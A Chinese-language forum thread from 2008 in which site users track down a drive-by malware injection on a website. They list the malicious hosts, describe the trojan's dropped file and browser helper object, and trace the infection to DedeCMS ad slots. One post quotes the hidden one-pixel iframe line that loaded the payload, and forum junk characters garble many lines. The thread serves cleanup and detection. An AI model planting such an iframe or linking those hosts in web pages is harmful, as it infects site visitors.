webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
& x; \+ p. h3 A- |( Ghttp://ppp.749571.com/dm/test.htm
9 m( o. d( r8 Ghttp://www.985676.cn/encrypt/mm.htm
9 M  r, p; B- ~$ A這兩個是免殺的，還有幾個沒記下來，
. g5 ~5 c3 d+ [這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

會在C盤下產生 CRESS1.EXE
然後增加IE的BHO的木馬 還釋放驅動

昏 他藏得好隱秘  找到了 放毒得地方了
. x2 Y" y! d, q9 I5 `% t( f1 W! h
iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
8 N' {# {- ~# z  r: ^( P然後再這個地址轉到ppp.749571.co m/dm/test.htm
, ^- _% F/ C' k& p為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。
靜水趕快清理了吧

原帖由 20082008 於 2008-1-9 16:33 發表
沒裝REAL就沒事，好在我重新裝的系統:

說的沒錯

原帖由 freelzyr 於 2008-1-10 16:47 發表
* g% N. S3 L  S7 C進dede後台
( x8 A: ^7 t3 m9 ]* W+ U檢查 ad_js.php?aid=1  
ad_js.php?aid=2
0 r* x% X' m/ ~: P2 f) o6 ?* @ad_js.php?aid=3
0 {! ~* C$ a7 V& Nad_js.php?aid=4

) x) @3 c. m. l  W% W4 X; Q$ ?這幾個廣告 裡面的代碼
9 q$ B, _6 \1 H2 G6 o( Y在這幾個 掉茅廁位 裡面   含有 木馬的 代碼

5 O1 _+ K, v4 i2 R6 z. ~這個檢查了沒有的

原帖由 靜水流深 於 2008-1-11 02:27 發表


. t0 ?8 ?4 N0 n$ v這個檢查了沒有的

3 R5 R3 S; j- x  p

# \0 U/ s7 q# g9 k2 ?, [, x- ~我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

原帖由 靜水流深 於 2008-1-11 02:27 發表
) |, w- I- g; j' A: V: ]

這個檢查了沒有的

6 J$ K( l5 L- O木馬就是在這裡裡啊
' z& E, y" H- W' `在後台的掉茅廁位設置那
# T" V2 x2 B% Y裡

現在明瞭.
有人收流量做ppp.749571.co m的..
最近被掛馬的話. 都改成js了. 不用iframe了

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景